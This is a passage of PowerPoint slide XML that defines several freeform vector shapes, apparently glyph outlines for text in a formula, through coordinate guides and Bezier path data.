                    <a:pt x="131" y="377"/>
                    <a:pt x="131" y="37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85" name="Freeform 226">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2C0DAC-6B66-46B4-BF0A-21F750DEC3E3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId26"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2884489" y="3217863"/>
              <a:ext cx="19050" cy="65088"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 45 w 46"/>
                <a:gd name="T1" fmla="*/ 28 h 147"/>
                <a:gd name="T2" fmla="*/ 23 w 46"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 0 w 46"/>
                <a:gd name="T5" fmla="*/ 22 h 147"/>
                <a:gd name="T6" fmla="*/ 1 w 46"/>
                <a:gd name="T7" fmla="*/ 32 h 147"/>
                <a:gd name="T8" fmla="*/ 7 w 46"/>
                <a:gd name="T9" fmla="*/ 128 h 147"/>
                <a:gd name="T10" fmla="*/ 23 w 46"/>
                <a:gd name="T11" fmla="*/ 147 h 147"/>
                <a:gd name="T12" fmla="*/ 38 w 46"/>
                <a:gd name="T13" fmla="*/ 128 h 147"/>
                <a:gd name="T14" fmla="*/ 45 w 46"/>
                <a:gd name="T15" fmla="*/ 28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147">
                  <a:moveTo>
                    <a:pt x="45" y="28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="8"/>
                    <a:pt x="35" y="0"/>
                    <a:pt x="23" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="0"/>
                    <a:pt x="0" y="10"/>
                    <a:pt x="0" y="22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7" y="128"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="8" y="147"/>
                    <a:pt x="23" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="38" y="136"/>
                    <a:pt x="38" y="128"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45"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86" name="Freeform 227">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A2C2F3D-3B61-4841-BC94-AE429D122C4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId27"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2960689" y="3232151"/>
              <a:ext cx="87313" cy="109538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 194 w 206"/>
                <a:gd name="T1" fmla="*/ 34 h 249"/>
                <a:gd name="T2" fmla="*/ 206 w 206"/>
                <a:gd name="T3" fmla="*/ 17 h 249"/>
                <a:gd name="T4" fmla="*/ 188 w 206"/>
                <a:gd name="T5" fmla="*/ 0 h 249"/>
                <a:gd name="T6" fmla="*/ 175 w 206"/>
                <a:gd name="T7" fmla="*/ 5 h 249"/>
                <a:gd name="T8" fmla="*/ 11 w 206"/>
                <a:gd name="T9" fmla="*/ 108 h 249"/>
                <a:gd name="T10" fmla="*/ 0 w 206"/>
                <a:gd name="T11" fmla="*/ 125 h 249"/>
                <a:gd name="T12" fmla="*/ 9 w 206"/>
                <a:gd name="T13" fmla="*/ 140 h 249"/>
                <a:gd name="T14" fmla="*/ 175 w 206"/>
                <a:gd name="T15" fmla="*/ 244 h 249"/>
                <a:gd name="T16" fmla="*/ 188 w 206"/>
                <a:gd name="T17" fmla="*/ 249 h 249"/>
                <a:gd name="T18" fmla="*/ 206 w 206"/>
                <a:gd name="T19" fmla="*/ 232 h 249"/>
                <a:gd name="T20" fmla="*/ 194 w 206"/>
                <a:gd name="T21" fmla="*/ 215 h 249"/>
                <a:gd name="T22" fmla="*/ 51 w 206"/>
                <a:gd name="T23" fmla="*/ 125 h 249"/>
                <a:gd name="T24" fmla="*/ 194 w 206"/>
                <a:gd name="T25" fmla="*/ 3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49">
                  <a:moveTo>
                    <a:pt x="194" y="34"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="31"/>
                    <a:pt x="206" y="27"/>
                    <a:pt x="206" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="6"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="188" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="0"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="175" y="5"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11" y="108"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="111"/>
                    <a:pt x="0" y="115"/>
                    <a:pt x="0" y="125"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="131"/>
                    <a:pt x="4" y="137"/>
                    <a:pt x="9" y="140"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="175" y="244"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="182" y="249"/>
                    <a:pt x="184" y="249"/>
                    <a:pt x="188" y="249"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="249"/>
                    <a:pt x="206" y="243"/>
                    <a:pt x="206" y="232"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="222"/>
                    <a:pt x="199" y="218"/>
                    <a:pt x="194" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="51" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194" y="3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87" name="Freeform 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{267B8720-A149-4858-8CF1-37C1274C7855}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId28"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3076576" y="3219451"/>
              <a:ext cx="79375" cy="134938"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 121 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 121 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 167 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="121"/>
                    <a:pt x="17" y="121"/>
                    <a:pt x="24" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="167" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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88" name="Freeform 229">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB389FD9-6911-4701-A727-E96919CBB587}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId29"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168651" y="3259138"/>
              <a:ext cx="109538" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 56 w 259"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 36 w 259"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 20 w 259"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 259"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 28 w 259"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 28 w 259"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 259"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 20 w 259"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 64 w 259"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 84 w 259"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 56 w 259"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 56 w 259"/>
                <a:gd name="T23" fmla="*/ 99 h 218"/>
                <a:gd name="T24" fmla="*/ 97 w 259"/>
                <a:gd name="T25" fmla="*/ 31 h 218"/>
                <a:gd name="T26" fmla="*/ 115 w 259"/>
                <a:gd name="T27" fmla="*/ 72 h 218"/>
                <a:gd name="T28" fmla="*/ 115 w 259"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 93 w 259"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 114 w 259"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 151 w 259"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 259"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 143 w 259"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 143 w 259"/>
                <a:gd name="T41" fmla="*/ 99 h 218"/>
                <a:gd name="T42" fmla="*/ 184 w 259"/>
                <a:gd name="T43" fmla="*/ 31 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 259"/>
                <a:gd name="T45" fmla="*/ 72 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 259"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 259"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 201 w 259"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 238 w 259"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 259 w 259"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 230 w 259"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 230 w 259"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 186 w 259"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 137 w 259"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 99 w 259"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 56 w 259"/>
                <a:gd name="T67"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9" h="218">
                  <a:moveTo>
                    <a:pt x="56" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="3"/>
                    <a:pt x="45" y="3"/>
                    <a:pt x="36" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="10" y="34"/>
                    <a:pt x="28" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="28" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="64" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="218"/>
                    <a:pt x="84" y="218"/>
                    <a:pt x="84" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="84" y="188"/>
                    <a:pt x="74" y="188"/>
                    <a:pt x="56" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="54"/>
                    <a:pt x="76" y="31"/>
                    <a:pt x="97" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="108" y="31"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="188"/>
                    <a:pt x="93" y="188"/>
                    <a:pt x="93" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="218"/>
                    <a:pt x="107" y="218"/>
                    <a:pt x="114" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="218"/>
                    <a:pt x="172" y="218"/>
                    <a:pt x="172" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="172" y="188"/>
                    <a:pt x="161" y="188"/>
                    <a:pt x="143" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="143" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="54"/>
                    <a:pt x="164" y="31"/>
                    <a:pt x="184" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="31"/>
                    <a:pt x="203" y="39"/>
                    <a:pt x="203" y="72"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="203" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="188"/>
                    <a:pt x="181" y="188"/>
                    <a:pt x="181" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="218"/>
                    <a:pt x="194" y="218"/>
                    <a:pt x="201" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="238" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="218"/>
                    <a:pt x="259" y="218"/>
                    <a:pt x="259" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="259" y="188"/>
                    <a:pt x="248" y="188"/>
                    <a:pt x="230" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="67"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="57"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="0"/>
                    <a:pt x="151" y="7"/>
                    <a:pt x="137" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="129" y="9"/>
                    <a:pt x="115" y="0"/>
                    <a:pt x="99" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="68" y="7"/>
                    <a:pt x="56" y="1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89" name="Freeform 230">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40FB48F3-BEBD-4980-BA12-108418094C16}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId30"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3286126" y="3257551"/>
              <a:ext cx="101600" cy="146050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 101 w 239"/>
                <a:gd name="T1" fmla="*/ 132 h 334"/>
                <a:gd name="T2" fmla="*/ 54 w 239"/>
                <a:gd name="T3" fmla="*/ 83 h 334"/>
                <a:gd name="T4" fmla="*/ 101 w 239"/>
                <a:gd name="T5" fmla="*/ 32 h 334"/>
                <a:gd name="T6" fmla="*/ 149 w 239"/>
                <a:gd name="T7" fmla="*/ 82 h 334"/>
                <a:gd name="T8" fmla="*/ 101 w 239"/>
                <a:gd name="T9" fmla="*/ 132 h 334"/>
                <a:gd name="T10" fmla="*/ 57 w 239"/>
                <a:gd name="T11" fmla="*/ 150 h 334"/>
                <a:gd name="T12" fmla="*/ 101 w 239"/>
                <a:gd name="T13" fmla="*/ 162 h 334"/>
                <a:gd name="T14" fmla="*/ 184 w 239"/>
                <a:gd name="T15" fmla="*/ 82 h 334"/>
                <a:gd name="T16" fmla="*/ 171 w 239"/>
                <a:gd name="T17" fmla="*/ 39 h 334"/>
                <a:gd name="T18" fmla="*/ 200 w 239"/>
                <a:gd name="T19" fmla="*/ 30 h 334"/>
                <a:gd name="T20" fmla="*/ 219 w 239"/>
                <a:gd name="T21" fmla="*/ 47 h 334"/>
                <a:gd name="T22" fmla="*/ 239 w 239"/>
                <a:gd name="T23" fmla="*/ 27 h 334"/>
                <a:gd name="T24" fmla="*/ 203 w 239"/>
                <a:gd name="T25" fmla="*/ 0 h 334"/>
                <a:gd name="T26" fmla="*/ 150 w 239"/>
                <a:gd name="T27" fmla="*/ 17 h 334"/>
                <a:gd name="T28" fmla="*/ 101 w 239"/>
                <a:gd name="T29" fmla="*/ 2 h 334"/>
                <a:gd name="T30" fmla="*/ 19 w 239"/>
                <a:gd name="T31" fmla="*/ 82 h 334"/>
                <a:gd name="T32" fmla="*/ 35 w 239"/>
                <a:gd name="T33" fmla="*/ 129 h 334"/>
                <a:gd name="T34" fmla="*/ 25 w 239"/>
                <a:gd name="T35" fmla="*/ 163 h 334"/>
                <a:gd name="T36" fmla="*/ 37 w 239"/>
                <a:gd name="T37" fmla="*/ 199 h 334"/>
                <a:gd name="T38" fmla="*/ 0 w 239"/>
                <a:gd name="T39" fmla="*/ 261 h 334"/>
                <a:gd name="T40" fmla="*/ 116 w 239"/>
                <a:gd name="T41" fmla="*/ 334 h 334"/>
                <a:gd name="T42" fmla="*/ 232 w 239"/>
                <a:gd name="T43" fmla="*/ 261 h 334"/>
                <a:gd name="T44" fmla="*/ 198 w 239"/>
                <a:gd name="T45" fmla="*/ 204 h 334"/>
                <a:gd name="T46" fmla="*/ 125 w 239"/>
                <a:gd name="T47" fmla="*/ 190 h 334"/>
                <a:gd name="T48" fmla="*/ 90 w 239"/>
                <a:gd name="T49" fmla="*/ 190 h 334"/>
                <a:gd name="T50" fmla="*/ 76 w 239"/>
                <a:gd name="T51" fmla="*/ 189 h 334"/>
                <a:gd name="T52" fmla="*/ 60 w 239"/>
                <a:gd name="T53" fmla="*/ 182 h 334"/>
                <a:gd name="T54" fmla="*/ 54 w 239"/>
                <a:gd name="T55" fmla="*/ 164 h 334"/>
                <a:gd name="T56" fmla="*/ 57 w 239"/>
                <a:gd name="T57" fmla="*/ 150 h 334"/>
                <a:gd name="T58" fmla="*/ 116 w 239"/>
                <a:gd name="T59" fmla="*/ 305 h 334"/>
                <a:gd name="T60" fmla="*/ 29 w 239"/>
                <a:gd name="T61" fmla="*/ 261 h 334"/>
                <a:gd name="T62" fmla="*/ 49 w 239"/>
                <a:gd name="T63" fmla="*/ 226 h 334"/>
                <a:gd name="T64" fmla="*/ 102 w 239"/>
                <a:gd name="T65" fmla="*/ 218 h 334"/>
                <a:gd name="T66" fmla="*/ 203 w 239"/>
                <a:gd name="T67" fmla="*/ 261 h 334"/>
                <a:gd name="T68" fmla="*/ 116 w 239"/>
                <a:gd name="T69" fmla="*/ 30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 h="334">
                  <a:moveTo>
                    <a:pt x="101" y="132"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="132"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="101" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="32"/>
                    <a:pt x="149" y="56"/>
                    <a:pt x="149" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="111"/>
                    <a:pt x="127" y="132"/>
                    <a:pt x="101" y="132"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="151"/>
                    <a:pt x="77" y="162"/>
                    <a:pt x="101" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="162"/>
                    <a:pt x="184" y="126"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="179" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="33"/>
                    <a:pt x="193" y="31"/>
                    <a:pt x="200" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="214" y="47"/>
                    <a:pt x="219" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="239" y="41"/>
                    <a:pt x="239" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="15"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="150" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="124" y="2"/>
                    <a:pt x="101" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="2"/>
                    <a:pt x="19" y="40"/>
                    <a:pt x="19" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="35" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="137"/>
                    <a:pt x="25" y="148"/>
                    <a:pt x="25" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="181"/>
                    <a:pt x="32" y="193"/>
                    <a:pt x="37" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="52" y="334"/>
                    <a:pt x="116" y="334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="334"/>
                    <a:pt x="232" y="304"/>
                    <a:pt x="232" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="243"/>
                    <a:pt x="223" y="218"/>
                    <a:pt x="198" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="201"/>
                    <a:pt x="170" y="190"/>
                    <a:pt x="125" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="90" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="86" y="190"/>
                    <a:pt x="80" y="190"/>
                    <a:pt x="76" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
